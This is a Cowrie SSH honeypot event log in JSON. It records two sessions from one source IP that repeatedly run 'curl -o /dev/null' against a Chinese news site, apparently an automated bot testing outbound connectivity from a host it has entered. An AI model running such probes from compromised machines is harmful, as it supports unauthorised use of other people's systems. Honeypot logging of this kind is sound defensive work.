{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.910492Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.915794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.917243Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.925386Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.926103Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.929759Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.934153Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.935156Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.958742Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.961575Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.964650Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.971665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.972430Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.984792Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.985861Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.989519Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.993337Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.003312Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.009304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.010501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.011127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.017442Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.019831Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.020816Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.027532Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.046420Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.048418Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.049123Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.055638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.056308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.073582Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.087509Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.088156Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.091573Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.092340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.119303Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.126604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.127297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.130223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.130927Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.135911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.146765Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.164446Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.165122Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.167884Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.168607Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.171982Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.193376Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.201003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.204086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.204731Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.206490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.207347Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.241033Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.241657Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.243958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.244743Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.250087Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.282279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.282983Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.287032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.287725Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.295948Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.318485Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.320372Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.320974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.324624Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.325370Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.353298Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.357765Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.361495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.362063Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.364632Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.366438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:25.368634Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.369501Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.371944Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.379385Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:25.394252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
